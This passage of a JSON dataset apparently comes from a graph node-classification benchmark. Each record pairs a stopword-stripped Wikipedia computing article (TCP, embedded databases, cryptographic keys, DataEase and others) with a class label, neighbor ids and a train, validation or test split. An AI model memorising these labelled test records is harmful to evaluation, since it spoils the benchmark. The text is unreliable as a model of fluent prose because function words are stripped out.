      9569,
      612,
      8054,
      2812,
      4863
    ],
    "mask": "Train"
  },
  {
    "node_id": 10916,
    "label": 3,
    "text": "Software_incompatibility:software incompatibility software incompatibility characteristic software components systems operate satisfactorily together computer different computers linked computer network may components systems intended operate cooperatively independently software compatibility characteristic software components systems operate satisfactorily together computer different computers linked computer network possible software components systems may compatible one environment incompatible another consider sequential programs form particular program might use printer resource file resource b order print file several programs p1 p2 p3 ... operate time first one execute block others resources released programs execute turn problem makes difference whether uni-processor multi-processor system used allocation resources determines order execution note however programmers general constrained write programs particular way even guidelines may differ guidelines variant previous program may resources b previous example – simply dummy variables otherwise programs identical several programs q1 q2 q3 run time using resources problem however several ps set run time several qs deadlock condition arise note deadlock need arise may neither p q proceed one kind example programs may demonstrate incompatibility another example different kind would one software component provides service another incompatibility could simple change order parameters software component requesting service component providing service would kind interface incompatibility might considered bug could hard detect systems interface incompatibilities easily detected build stage particularly strongly typed systems others may hard find may detected run time others may almost impossible detect without detailed program analysis consider following example variant q q nowiki /nowiki similar behaviour following differences p never calls q set 100 using q nowiki /nowiki instead compatible computation however p calls q set 100 using q nowiki /nowiki instead lead non-terminating computation assume f x numeric value component q nowiki /nowiki defined may cause problem behaviour p calls q nowiki /nowiki 101 results computation incorrect may cause program failure p calls q nowiki /nowiki 102 results unpredictable failure may arise possibly due divide zero errors arithmetic overflow p calls q nowiki /nowiki y= 103 event p uses result division operation divide zero failure may occur example shows one program p1 may always compatible another q1 constructed programs q1 q1 nowiki /nowiki p1 q sometimes incompatible p1 q1 nowiki /nowiki always incompatible sometimes programs p q running computer presence one inhibit performance particularly happen computer uses virtual memory result may disk thrashing occurs one programs significantly reduced performance form incompatibility occur p q intended cooperate also occur p q completely unrelated happen run time example might p program produces large output files happen stored main memory q anti-virus program scans many files hard disk memory cache used virtual memory possible two programs interact adversely performance drastically reduced programs p q performance compatibility may depend environment run may substantially incompatible run computer limited main memory yet may possible run satisfactorily machine memory programs may performance incompatible almost environment",
    "neighbors": [
      2432,
      3137,
      10145,
      6020,
      1801,
      3725,
      8301,
      10734,
      3923,
      11539,
      1501
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10917,
    "label": 7,
    "text": "Corosync_Cluster_Engine:corosync cluster engine corosync cluster engine open source implementation totem single ring ordering membership protocol originally derived openais project licensed new bsd license mission corosync effort develop release support community-defined open source cluster corosync cluster engine group communication system additional features implementing high availability within applications project provides four c api features software designed operate udp/ip infiniband networks software composed executive binary uses client-server communication model libraries service engines loadable modules called service engines loaded corosync cluster engine use services provided corosync service engine internal api services provided corosync service engine internal api additionally corosync provides several default service engines used via c apis project formally announced july 2008 via conference paper ottawa linux symposium source code openais refactored core infrastructure components placed corosync sa forum apis kept openais second version corosync published 2012 quorum subsystem changed integrated daemon version available since fedora 17 rhel7",
    "neighbors": [
      11428,
      1701,
      9320,
      5612,
      1197,
      7983,
      3219,
      4852,
      11413,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10918,
    "label": 4,
    "text": "Cryptographic_key_types:cryptographic key types cryptographic key string data used lock unlock cryptographic functions including authentication authorization encryption cryptographic keys grouped cryptographic key types according functions perform consider keyring contains variety keys keys might various shapes sizes one thing certain generally serve separate purpose one key might used start automobile another might used open safety deposit box automobile key work open safety deposit box vice versa analogy provides insight cryptographic key types work keys categorized respect used properties possess cryptographic key categorized according used properties example key might one following properties symmetric public private keys may also grouped pairs one private one public key referred asymmetric key pair asymmetric keys differ symmetric keys algorithms use separate keys encryption decryption symmetric key ’ algorithm uses single key processes multiple keys used asymmetric algorithm process takes longer produce symmetric key algorithm would however benefits lay fact asymmetric algorithm much secure symmetric key algorithm symmetric key key needs transmitted receiver always possibility key could intercepted tampered asymmetric key message and/or accompanying data sent received using public key however receiver sender would use personal private key access message and/or accompanying data thus asymmetric keys suited use transmitting confidential messages data authentication required assurance message tampered receiver possession public key ’ corresponding private key ability decode message public key sent back forth recipients private key remains fixed one location sent back forth keeps safe intercepted transmission cryptographic keys may also keys designate used long-term static archived use used single session ephemeral latter generally applies use ephemeral key agreement key key types designed last long crypto-periods one two years shorter crypto-period designed different key types may used data encryption keys symmetric authentication keys private key-transport keys key-wrapping keys authorization keys rng keys page shows classification key types point view key management key management system key labeled one type key never used different purpose according nist sp 800-57 revision 4 following types keys exist",
    "neighbors": [
      8674,
      7075,
      7368,
      3629,
      8657,
      2932,
      4087,
      5433
    ],
    "mask": "Test"
  },
  {
    "node_id": 10919,
    "label": 1,
    "text": "DataEase:dataease dataease relational database management system rdbms considered rapid application development tool developing relationally-organized data-intensive software applications personal computers dataease created early 1980s software developers arun gupta joseph busch first version software released 1981 software solutions inc principals sold company sapphire international corporation united kingdom 1991 sapphire continues develop market product two distinct product arcs dataease history dataease dos dataease windows originally called datamaster dataease early hallmark ease non-programmers found could rapidly develop useful software applications dataease design emphasized visual design screen forms reports hiding almost arcane details properties underlying data structure addition complex data management processes would typically require multitude complex steps complete traditional programming tools handled automatically transparently user made changes his/her application example editing existing form user removed field added another indexed another changed data type yet another necessary steps required reflect changes data structure underlying form automatically non-destructively applied form saved report writing similarly streamlined user simply defined access desired data using simple procedural language known dataease query language dql prompting script editor permitted user instantly create dql script prior knowledge dql syntax remains one dataease overlooked beneficial features one required memorize details application components dql syntactical construction prior writing valid dql script employees salary 50000 yearsofservice 4 lastreviewgrade 85 addition simplified definition data forms reports procedures dataease dos provided facilities defining application user access navigational menus multi-format importing data sources data exporting data backup restoration system documentation user help backing restoring data integrating external programs application dataease dos applications provided record-level locking meaning could accessed simultaneously many users dataease dos gained eclectic following among application developers responsible managing proprietary business processes corporate world dataease resource guide published dataease international late 1980s lists approximately two hundred commercially available applications spanning specialized domains waste management law enforcement indeed many corporate users deployed business-critical applications using dataease including organizations nasa ford motor co. citimortgage fka lomas financial corporation american automobile club dataease dos distributed worldwide according information provided sapphire international peaked installed base approximately 2 million seats despite fact sapphire ceased distribution dataease dos 2003 significant number dataease dos applications remained active use worldwide 2008 dataease dos recognized number prestigious industry awards including dataease windows dfw rapid application development tool constructing windows database applications dataease windows abandoned many intuitive features dataease dos ancestor dataease windows product designed positioned address needs technical programmer due belief time soon data would stored sql-based client-server platforms dataease would evolve sql development tool dataease windows initially released 1994 follow dataease express lacked dql procedural language user interface overhauled automatic creation data structures along screens forms abandoned despite fact dataease windows incorporated automated migration tool de dos 4.53 ability directly acquire tables data dfd5 many long-time dataease dos users found difficult break hierarchical cui paradigm make best use new tools windows product dataease windows acceptance existing dataease dos users therefore significantly hindered delayed decision move instead upgraded recent dos versions found could share data windows versions achieve full windows application forms report layouts re-created scratch dfw even though business rules could imported tables dql could imported also either cutting pasting 'dos report facility dfw version 5.5 difficulty still remained application designed work-flow single-tasking dos environment frequently unsuited multi-session windows environment difficulty considerable expense posed task re-writing applications forced many otherwise-satisfied dataease users reconsider choice dataease platform conversely new users dataease windows previous experience found effective tool important systems written using second half 1990s since dataease version 7 2006 interoperability abandoned restrictive product development good 'windows citizen 2008 new dataease development team appointed leadership ulrik krohn take dataease new era eventually culminate completely web based product dataease 7.2 officially launched july 1 2009 version first use 64 bit operating system extensively reworked contain 1,000 improvements fixes release 7.2 also marked time dataease international ltd. became independent product company solely focused product development dataease services continue provided sapphire group dataease 7.3 scheduled end year dataease 8 promises web community dataease dos character based community completely web based full interoperability windows first dataease since dos improved interactive dql/oml/brl editing dataease 8 make easy make transaction intensive advanced web-based applications",
    "neighbors": [
      10286,
      1034,
      10899,
      6654
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10920,
    "label": 2,
    "text": "Inquisitor_(hardware_testing_software):inquisitor hardware testing software inquisitor software suite used hardware diagnostics stress testing certification benchmarking platform available three formats released terms version 3 gnu general public license inquisitor free software inquisitor started early 2004 closed project developed mikhail yakshin alt linux maxselect russian hardware vendor first versions closed-source although effort made open components versions 1 2 fully developed in-house fully adopted maxselect multiple branches versions concentrated server-based enterprise testing optimized mostly notebook hardware 2005 special abridged version inquisitor suite developed distribution live cds live cds supplied maxselect products every buyer stress test newly bought hardware ensure runs stable august 2007 legal complications solved inquisitor announced open source platform platform used implement various linux-based solutions deal hardware testing monitoring benchmarking july 2008 version 3.0 released public minimal steps undertaken purposes testing benchmarking called tests inquisitor implemented simple unix shell scripts run binary programs collects results simplest form test outputs binary result success failure advanced api supplied benchmarks output results inquisitor distribution includes following tests",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      10387,
      5397,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      2738,
      4790,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      2375,
      4039,
      8907,
      1110,
      9693,
      608,
      2914,
      6371,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      3565,
      7534,
      2671,
      7920,
      8177,
      9074,
      5363,
      10860,
      9461,
      6393,
      11388,
      8957,
      1150
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10921,
    "label": 1,
    "text": "Embedded_database:embedded database embedded database system database management system dbms tightly integrated application software requires access stored data database system hidden application ’ end-user requires little ongoing maintenance actually broad technology category includes term embedded database confusing small subset embedded database products used real-time embedded systems telecommunications switches consumer electronics devices see mobile database small-footprint databases could used embedded devices major embedded database products include alphabetical order sybase advantage database server ads full-featured embedded database management system provides isam relational data access compatible multiple platforms including windows linux netware available royalty-free local file-server database full client-server version ads around many years highly scalable administration support variety ides including .net framework .net object pascal delphi visual foxpro foxpro php visual basic vb visual objects vo vulcan clipper perl java xharbour etc derby embeddable sql engine written entirely java fully transactional multi-user decent sql subset derby mature engine freely available apache license actively maintained derby project page also distributed part oracle java se development kit jdk name java db empress software inc. developer empress embedded database privately held company founded 1979 empress embedded database full-function relational database embedded applications organizations small large deployment environments including medical systems network routers nuclear power plant monitors satellite management systems embedded system applications require reliability power empress acid compliant sql database engine c c++ java jdbc odbc sql ado.net kernel level apis applications developed using apis may run standalone and/or server modes empress embedded database runs linux unix microsoft windows real-time operating systems ese indexed sequential access method isam data storage technology microsoft ese notably core microsoft exchange server active directory purpose allow applications store retrieve data via indexed sequential access windows mail desktop search windows vista operating system also make use ese store indexes property information respectively mcobject launched extremedb first in-memory embedded database designed scratch real-time embedded systems initial product soon joined extremedb high availability ha fault tolerant applications product family includes 64-bit transaction logging editions hybrid extremedb fusion combines in-memory on-disk data storage 2008 mcobject introduced extremedb kernel mode first embedded dbms designed run operating system kernel today extremedb used millions real-time embedded systems worldwide mcobject also offers perst open source object-oriented embedded database java java .net .net compact framework silverlight firebird embedded relational database engine open source fork interbase acid compliant supports triggers stored procedures available linux osx windows systems features classic superserver version firebird two threads applications access database time starting firebird 2.5 firebird embedded acts local server one threaded client accessing databases means works properly asp.net web applications user thread means two users could access database time would thread asp.net opens new thread user exports standard firebird api entrypoints main advantage firebird embedded databases unlike sqlite access databases plugged full firebird server without modifications also multiplatform runs linux os x full asp.net mono support written java open source fast database engine embedded server mode clustering support run inside google app engine supports encrypted database files aes xtea development h2 started may 2004 first published december 14 2005 h2 dual licensed available modified version mpl 1.1 mozilla public license unmodified epl 1.0 eclipse public license haildb standalone embeddable form innodb storage engine given haildb based code base innodb storage engine contains many features high-performance scalability multiversion concurrency control mvcc row-level locking deadlock detection fault tolerance automatic crash recovery etc however embedded engine completely independent mysql lacks server components networking object-level permissions etc eliminating mysql server overhead innodb small footprint well-suited embedding applications require high-performance concurrency embedded database systems haildb designed accessed primarily isam-like c api rather sql though extremely rudimentary sql variant supported project longer maintained hsqldb opensource relational database management system bsd-like license runs java virtual machine embedded application hsqldb supports variety in-memory disk-based table modes unicode sql:2008 infinitydb embedded java dbms sorted hierarchical key/value store encrypted edition client/server edition multi-core speed patent-applied-for infinitydb secure transactional compressing robust single file instant installation zero administration apis include simple fast 'itemspace concurrentnavigablemap view json remoteitemspace transparently redirect embedded apis db instances client/server includes light-weight servlet server web admin database browsing rest python informix dynamic server ids characterized enterprise class embeddable database server combining embeddable features low footprint programmable autonomic capabilities enterprise class database features high availability flexible replication features ids used deeply embedded scenarios ip telephony call-processing systems point sale applications financial transaction processing systems interbase iot award-winning cross-platform unicode enabled sql database platform able embedded within turn-key applications box smp support disk aes strength 256bit encryption sql 92 acid compliance support windows macintosh linux solaris ios android platforms ideal small-to-medium large enterprises supporting hundreds users mobile application development interbase light free version used mobile device ideal mobile applications enterprises switch paid version requirements change management security increase interbase high adoption defense airspace oil gas manufacturing industries leveldb ordered key/value store created google lightweight implementation bigtable storage design library way use leveldb native api c++ also includes official c wrappers functionality third-party api wrappers exist python php go pure go leveldb implementation exists progress still node.js objective c. google distributes leveldb new bsd license lightning memory-mapped database lmdb memory-mapped key-value database openldap project written c api modeled berkeley db api though much simplified library extremely compact compiling 40kb x86 object code corruption proof orders magnitude faster robust scalable efficient similar libraries like berkeley db leveldb etc library implements b+trees multiversion concurrency control mvcc single level store copy write provides full acid transactions deadlocks library optimized high read concurrency readers need locks readers n't block writers writers n't block readers read performance scales perfectly linearly across arbitrarily many threads cpus third-party wrappers exist c++ erlang python lmdb distributed openldap project openldap public license 2013 openldap project deprecating use berkeley db favor lmdb embedded zero maintenance version proprietary mimer sql database available mongodb cross-platform document-oriented database program mongodb stores data flexible json-like documents meaning fields vary document document data structure changed time document model maps objects application code making data easy work ad hoc queries indexing real time aggregation provide powerful ways access analyze data mongodb distributed database core high availability horizontal scaling geographic distribution built easy use mongodb open-source published gnu affero general public license mongodb embedded across many industries high tech finserv retail healthcare use cases security fraud iot cms prestigious companies world embedded libmysqld mysql embedded server library provides features regular mysql linkable library run context client process initialization clients use c api calls talking separate mysql server less communication overhead need separate database process nexusdb commercial successor flashfiler database open source embedded delphi applications create stand-alone executables full database functionality objectbox nosql acid-compliant on-device object-oriented key-value database mobile iot name implies oracle ’ embedded database actually berkeley db oracle acquired sleepycat software originally developed university california berkeley db fast open-source embedded database used several well-known open-source products including linux bsd unix operating systems apache web server openoffice productivity suite nonetheless recent years many well-known projects switched using lmdb outperform berkeley db key scenarios ground less design well due license changing raima database manager produced raima one first database management systems categorized embedded database according raima definition product embedded two senses first embedded within application becoming extension application second possible use embedded computer/os real-time environments small footprint efficient operation apis c/c++ sql designed support limited resources embedded environments since initial release rdm embedded continually evolving currently released version 14.1 rocksdb created facebook began fork leveldb focuses performance especially ssds adds many features including transactions backups snapshots bloom filters column families expiry custom merge operators tunable compaction statistics collection geospatial indexing used storage engine inside several databases including arangodb ceph cockroachdb mongorocks myrocks rocksandra tikv soliddb hybrid on-disk/in-memory relational database often used embedded system database telecommunications equipment network software similar systems in-memory database technology used achieve throughput tens thousands transactions per second response times measured microseconds high availability option maintains two copies data synchronized times case system failure applications recover access soliddb less second without loss data sqlite software library implements self-contained server-less zero-configuration transactional sql database engine sqlite widely deployed sql database engine world source code chiefly c sqlite public domain includes native c library simple command line client database ’ included several operating systems among android freebsd ios os x windows 10 microsoft sql server compact embedded database wide variety features like multi-process connections t-sql ado.net sync services sync back end database merge replication sql server programming api linq sql linq entities ado.net product runs desktop mobile windows platforms market long time used many enterprises production software case studies product went multiple re-brandings known multiple names like sql ce sql server ce sql server mobile sql mobile",
    "neighbors": [
      8576,
      2051,
      516,
      4995,
      4614,
      8326,
      7816,
      1801,
      7946,
      8201,
      8582,
      11017,
      9360,
      3219,
      5779,
      2966,
      4502,
      3096,
      9366,
      154,
      10518,
      3366,
      10413,
      5546,
      1579,
      428,
      2605,
      3886,
      5677,
      6831,
      7728,
      9010,
      6451,
      9263,
      6709,
      9389,
      10292,
      5560,
      1849,
      1594,
      1593,
      10048,
      321,
      5953,
      11203,
      8644,
      10693,
      8262,
      9286,
      3400,
      847,
      2901,
      477,
      4957,
      6112,
      3427,
      4964,
      8291,
      8675,
      6631,
      9320,
      3561,
      10471,
      3435,
      7022,
      1136,
      2804,
      3573,
      4598,
      5492,
      8189,
      3582,
      9471
    ],
    "mask": "None"
  },
  {
    "node_id": 10922,
    "label": 2,
    "text": "Daniel_Ravicher:daniel ravicher daniel dan ravicher serves executive director public patent foundation pubpat",
    "neighbors": [
      1394
    ],
    "mask": "None"
  },
  {
    "node_id": 10923,
    "label": 5,
    "text": "Radius_Values:radius values remote authentication dial user service radius networking protocol provides centralized authentication authorization accounting aaa management computers connect use network service attributes radius use defined rfc 2865 .5",
    "neighbors": [
      10058
    ],
    "mask": "Test"
  },
  {
    "node_id": 10924,
    "label": 5,
    "text": "Transmission_Control_Protocol:transmission control protocol transmission control protocol tcp one main protocols internet protocol suite originated initial network implementation complemented internet protocol ip therefore entire suite commonly referred tcp/ip tcp provides reliable ordered error-checked delivery stream octets bytes applications running hosts communicating via ip network major internet applications world wide web email remote administration file transfer rely tcp applications require reliable data stream service may use user datagram protocol udp provides connectionless datagram service emphasizes reduced latency reliability may 1974 vint cerf bob kahn described internetworking protocol sharing resources using packet switching among network nodes authors working gérard le lann incorporate concepts french cyclades project new network central control component model transmission control program incorporated connection-oriented links datagram services hosts monolithic transmission control program later divided modular architecture consisting transmission control protocol internet protocol resulted networking model became known informally tcp/ip although formally variously referred department defense dod model arpanet model eventually also internet protocol suite 2004 vint cerf bob kahn received turing award foundational work tcp/ip transmission control protocol provides communication service intermediate level application program internet protocol provides host-to-host connectivity transport layer internet model application need know particular mechanisms sending data via link another host required ip fragmentation accommodate maximum transmission unit transmission medium transport layer tcp handles handshaking transmission details presents abstraction network connection application typically network socket interface lower levels protocol stack due network congestion traffic load balancing unpredictable network behaviour ip packets may lost duplicated delivered order tcp detects problems requests re-transmission lost data rearranges out-of-order data even helps minimize network congestion reduce occurrence problems data still remains undelivered source notified failure tcp receiver reassembled sequence octets originally transmitted passes receiving application thus tcp abstracts application communication underlying networking details tcp used extensively many internet applications including world wide web www email file transfer protocol secure shell peer-to-peer file sharing streaming media tcp optimized accurate delivery rather timely delivery incur relatively long delays order seconds waiting out-of-order messages re-transmissions lost messages therefore particularly suitable real-time applications voice ip applications protocols like real-time transport protocol rtp operating user datagram protocol udp usually recommended instead tcp reliable stream delivery service guarantees bytes received identical order sent since packet transfer many networks reliable tcp achieves using technique known positive acknowledgement re-transmission requires receiver respond acknowledgement message receives data sender keeps record packet sends maintains timer packet sent sender re-transmits packet timer expires receiving acknowledgement timer needed case packet gets lost corrupted ip handles actual delivery data tcp keeps track segments individual units data transmission message divided efficient routing network example html file sent web server tcp software layer server divides file segments forwards individually internet layer network stack internet layer software encapsulates tcp segment ip packet adding header includes among data destination ip address client program destination computer receives tcp software transport layer re-assembles segments ensures correctly ordered error-free streams file contents receiving application transmission control protocol accepts data data stream divides chunks adds tcp header creating tcp segment tcp segment encapsulated internet protocol ip datagram exchanged peers term tcp packet appears informal formal usage whereas precise terminology segment refers tcp protocol data unit pdu datagram ip pdu frame data link layer pdu processes transmit data calling tcp passing buffers data arguments tcp packages data buffers segments calls internet module e.g ip transmit segment destination tcp tcp segment consists segment header data section tcp header contains 10 mandatory fields optional extension field options pink background table data section follows header contents payload data carried application length data section specified tcp segment header calculated subtracting combined length tcp header encapsulating ip header total ip datagram length specified ip header tcp protocol operations may divided three phases connections must properly established multi-step handshake process connection establishment entering data transfer phase data transmission completed connection termination closes established virtual circuits releases allocated resources tcp connection managed operating system resource represents local end-point communications internet socket lifetime tcp connection local end-point undergoes series state changes establish connection tcp uses three-way handshake client attempts connect server server must first bind listen port open connections called passive open passive open established client may initiate active open establish connection three-way 3-step handshake occurs point client server received acknowledgment connection steps 1 2 establish connection parameter sequence number one direction acknowledged steps 2 3 establish connection parameter sequence number direction acknowledged full-duplex communication established connection termination phase uses four-way handshake side connection terminating independently endpoint wishes stop half connection transmits fin packet end acknowledges ack therefore typical tear-down requires pair fin ack segments tcp endpoint side sent first fin responded final ack waits timeout finally closing connection time local port unavailable new connections prevents confusion due delayed packets delivered subsequent connections connection half-open case one side terminated end side terminated longer send data connection side terminating side continue reading data side terminates well also possible terminate connection 3-way handshake host sends fin host b replies fin ack merely combines 2 steps one host replies ack host tcp stacks may implement half-duplex close sequence linux hp-ux host actively closes connection still read incoming data stack already received link host sends rst instead fin section 4.2.2.13 rfc 1122 allows tcp application sure remote application read data former sent—waiting fin remote side actively closes connection remote tcp stack distinguish connection aborting rst data loss rst cause remote stack lose data received application protocols using tcp open/close handshaking application protocol open/close handshaking may find rst problem active close example program flow like tcp/ip stack like described guarantee data arrives application unread data arrived end implementations allocate entry table maps session running operating system process tcp packets include session identifier endpoints identify session using client address port whenever packet received tcp implementation must perform lookup table find destination process entry table known transmission control block tcb contains information endpoints ip port status connection running data packets exchanged buffers sending receiving data number sessions server side limited memory grow new connections arrive client must allocate random port sending first syn server port remains allocated whole conversation effectively limits number outgoing connections client ip addresses application fails properly close unrequired connections client run resources become unable establish new tcp connections even applications endpoints must also allocate space unacknowledged packets received unread data key features set tcp apart user datagram protocol tcp uses sequence number identify byte data sequence number identifies order bytes sent computer data reconstructed order regardless packet reordering packet loss may occur transmission sequence number first byte chosen transmitter first packet flagged syn number arbitrary fact unpredictable defend tcp sequence prediction attacks acknowledgements acks sent sequence number receiver data tell sender data received specified byte acks imply data delivered application merely signify receiver responsibility deliver data reliability achieved sender detecting lost data retransmitting tcp uses two primary techniques identify loss retransmission timeout abbreviated rto duplicate cumulative acknowledgements dupacks single packet say packet 100 stream lost receiver acknowledge packets 100 uses cumulative acks hence receiver acknowledges packet 99 receipt another data packet duplicate acknowledgement used signal packet loss sender receives three duplicate acknowledgements retransmits last unacknowledged packet threshold three used network may reorder packets causing duplicate acknowledgements threshold demonstrated avoid spurious retransmissions due reordering sometimes selective acknowledgements sacks used give explicit feedback packets received greatly improves tcp ability retransmit right packets whenever packet sent sender sets timer conservative estimate packet acked sender receive ack transmits packet timer reset every time sender receives acknowledgement means retransmit timer fires sender received acknowledgement long time typically timer value set formula_1 formula_2 clock granularity case retransmit timer fired still acknowledgement received next timer set twice previous value certain threshold among things helps defend man-in-the-middle denial service attack tries fool sender making many retransmissions receiver overwhelmed sender infers data lost network using one two techniques described retransmits data sequence numbers allow receivers discard duplicate packets properly sequence reordered packets acknowledgments allow senders determine retransmit lost packets assure correctness checksum field included see checksum computation section details checksumming tcp checksum weak check modern standards data link layers high bit error rates may require additional link error correction/detection capabilities weak checksum partially compensated common use crc better integrity check layer 2 tcp ip used ppp ethernet frame however mean 16-bit tcp checksum redundant remarkably introduction errors packets crc-protected hops common end-to-end 16-bit tcp checksum catches simple errors end-to-end principle work tcp uses end-to-end flow control protocol avoid sender send data fast tcp receiver receive process reliably mechanism flow control essential environment machines diverse network speeds communicate example pc sends data smartphone slowly processing received data smartphone must regulate data flow overwhelmed tcp uses sliding window flow control protocol tcp segment receiver specifies receive window field amount additionally received data bytes willing buffer connection sending host send amount data must wait acknowledgement window update receiving host receiver advertises window size 0 sender stops sending data starts persist timer persist timer used protect tcp deadlock situation could arise subsequent window size update receiver lost sender send data receiving new window size update receiver persist timer expires tcp sender attempts recovery sending small packet receiver responds sending another acknowledgement containing new window size receiver processing incoming data small increments may repeatedly advertise small receive window referred silly window syndrome since inefficient send bytes data tcp segment given relatively large overhead tcp header final main aspect tcp congestion control tcp uses number mechanisms achieve high performance avoid congestion collapse network performance fall several orders magnitude mechanisms control rate data entering network keeping data flow rate would trigger collapse also yield approximately max-min fair allocation flows acknowledgments data sent lack acknowledgments used senders infer network conditions tcp sender receiver coupled timers tcp senders receivers alter behavior flow data generally referred congestion control and/or network congestion avoidance modern implementations tcp contain four intertwined algorithms slow-start congestion avoidance fast retransmit fast recovery rfc 5681 addition senders employ retransmission timeout rto based estimated round-trip time rtt sender receiver well variance round trip time behavior timer specified rfc 6298 subtleties estimation rtt example senders must careful calculating rtt samples retransmitted packets typically use karn algorithm tcp timestamps see rfc 1323 individual rtt samples averaged time create smoothed round trip time srtt using jacobson algorithm srtt value finally used round-trip time estimate enhancing tcp reliably handle loss minimize errors manage congestion go fast high-speed environments ongoing areas research standards development result number tcp congestion avoidance algorithm variations maximum segment size mss largest amount data specified bytes tcp willing receive single segment best performance mss set small enough avoid ip fragmentation lead packet loss excessive retransmissions try accomplish typically mss announced side using mss option tcp connection established case derived maximum transmission unit mtu size data link layer networks sender receiver directly attached furthermore tcp senders use path mtu discovery infer minimum mtu along network path sender receiver use dynamically adjust mss avoid ip fragmentation within network mss announcement also often called mss negotiation strictly speaking mss negotiated originator receiver would imply originator receiver negotiate agree upon single unified mss applies communication directions connection fact two completely independent values mss permitted two directions data flow tcp connection situation may arise example one devices participating connection extremely limited amount memory reserved perhaps even smaller overall discovered path mtu processing incoming tcp segments relying purely cumulative acknowledgment scheme employed original tcp protocol lead inefficiencies packets lost example suppose bytes sequence number 1,000 10,999 sent 10 different tcp segments equal size second segment sequence numbers 2,000 2,999 lost transmission pure cumulative acknowledgment protocol receiver send cumulative ack value 2,000 sequence number immediately following last sequence number received data say received bytes 3,000 10,999 successfully thus sender may resend data starting sequence number 2,000 alleviate issue tcp employs selective acknowledgment sack option defined 1996 rfc 2018 allows receiver acknowledge discontinuous blocks packets received correctly addition sequence number immediately following last sequence number last contiguous byte received successively basic tcp acknowledgment acknowledgement specify number sack blocks sack block conveyed left edge block first sequence number block right edge block sequence number immediately following last sequence number block block contiguous range receiver correctly received example receiver would send ack segment cumulative ack value 2,000 sack option header sequence numbers 3,000 11,000 sender would accordingly retransmit second segment sequence numbers 2,000 2,999 tcp sender interpret out-of-order segment delivery lost segment tcp sender retransmit segment previous out-of-order packet slow data delivery rate connection duplicate-sack option extension sack option defined may 2000 rfc 2883 solves problem tcp receiver sends d-ack indicate segments lost tcp sender reinstate higher transmission-rate sack option mandatory comes operation parties support negotiated connection established sack uses tcp header option see tcp segment structure details use sack become widespread—all popular tcp stacks support selective acknowledgment also used stream control transmission protocol sctp efficient use high-bandwidth networks larger tcp window size may used tcp window size field controls flow data value limited 2 65,535 bytes since size field expanded scaling factor used tcp window scale option defined rfc 1323 option used increase maximum window size 65,535 bytes 1 gigabyte scaling larger window sizes part necessary tcp tuning window scale option used tcp 3-way handshake window scale value represents number bits left-shift 16-bit window size field window scale value set 0 shift 14 direction independently sides must send option syn segments enable window scaling either direction routers packet firewalls rewrite window scaling factor transmission causes sending receiving sides assume different tcp window sizes result non-stable traffic may slow problem visible sites behind defective router tcp timestamps defined rfc 1323 1992 help tcp determine order packets sent tcp timestamps normally aligned system clock start random value many operating systems increment timestamp every elapsed millisecond however rfc states ticks proportional two timestamp fields tcp timestamps used algorithm known protection wrapped sequence numbers paws see rfc 1323 details paws used receive window crosses sequence number wraparound boundary case packet potentially retransmitted answers question sequence number first 4 gb second timestamp used break tie also eifel detection algorithm rfc 3522 uses tcp timestamps determine retransmissions occurring packets lost simply order recent statistics show level timestamp adoption stagnated ~40 owing windows server dropping support since windows server 2008 tcp timestamps enabled default linux kernel. disabled default windows server 2008 2012 2016 possible interrupt abort queued stream instead waiting stream finish done specifying data urgent tells receiving program process immediately along rest urgent data finished tcp informs application resumes back stream queue example tcp used remote login session user send keyboard sequence interrupts aborts program end signals often needed program remote machine fails operate correctly signals must sent without waiting program finish current transfer tcp out-of-band data designed modern internet urgent pointer alters processing remote host n't expedite processing network gets remote host two slightly different interpretations protocol means single bytes oob data reliable assuming reliable one least commonly used protocol elements tends poorly implemented normally tcp waits 200 ms full packet data send nagle algorithm tries group small messages single packet wait creates small potentially serious delays repeated constantly file transfer example typical send block would 4 kb typical mss 1460 2 packets go 10 mbit/s ethernet taking ~1.2 ms followed third carrying remaining 1176 197 ms pause tcp waiting full buffer case telnet user keystroke echoed back server user see screen delay would become annoying setting socket option codice_1 overrides default 200 ms send delay application programs use socket option force output sent writing character line characters rfc defines codice_2 push bit message receiving tcp stack send data immediately receiving application way indicate control user space using berkeley sockets controlled protocol stack tcp may attacked variety ways results thorough security assessment tcp along possible mitigations identified issues published 2009 currently pursued within ietf using spoofed ip address repeatedly sending purposely assembled syn packets followed many ack packets attackers cause server consume large amounts resources keeping track bogus connections known syn flood attack proposed solutions problem include syn cookies cryptographic puzzles though syn cookies come set vulnerabilities sockstress similar attack might mitigated system resource management advanced dos attack involving exploitation tcp persist timer analyzed phrack 66 push ack floods variants attacker able eavesdrop tcp session redirect packets hijack tcp connection attacker learns sequence number ongoing communication forges false segment looks like next segment stream simple hijack result one packet erroneously accepted one end receiving host acknowledges extra segment side connection synchronization lost hijacking might combined address resolution protocol arp routing attacks allow taking control packet flow get permanent control hijacked tcp connection impersonating different ip address difficult prior rfc 1948 initial sequence number easily guessable allowed attacker blindly send sequence packets receiver would believe come different ip address without need deploy arp routing attacks enough ensure legitimate host impersonated ip address bring condition using denial-of-service attacks initial sequence number chosen random attacker eavesdrop predict size next packet sent cause receiver accept malicious payload without disrupting existing connection attacker injects malicious packet sequence number payload size next expected packet legitimate packet ultimately received found sequence number length packet already received silently dropped normal duplicate packet—the legitimate packet vetoed malicious packet unlike connection hijacking connection never desynchronized communication continues normal malicious payload accepted tcp veto gives attacker less control communication makes attack particularly resistant detection large increase network traffic ack storm avoided evidence receiver something amiss single duplicate packet normal occurrence ip network sender vetoed packet never sees evidence attack another vulnerability tcp reset attack tcp udp use port numbers identify sending receiving application end-points host often called internet sockets side tcp connection associated 16-bit unsigned port number 0-65535 reserved sending receiving application arriving tcp packets identified belonging specific tcp connection sockets combination source host address source port destination host address destination port means server computer provide several clients several services simultaneously long client takes care initiating simultaneous connections one destination port different source ports port numbers categorized three basic categories well-known registered dynamic/private well-known ports assigned internet assigned numbers authority iana typically used system-level root processes well-known applications running servers passively listening connections typically use ports examples include ftp 20 21 ssh 22 telnet 23 smtp 25 http ssl/tls 443 http 80 registered ports typically used end user applications ephemeral source ports contacting servers also identify named services registered third party dynamic/private ports also used end user applications less commonly dynamic/private ports contain meaning outside particular tcp connection network address translation nat typically uses dynamic port numbers internet-facing public side disambiguate flow traffic passing public network private 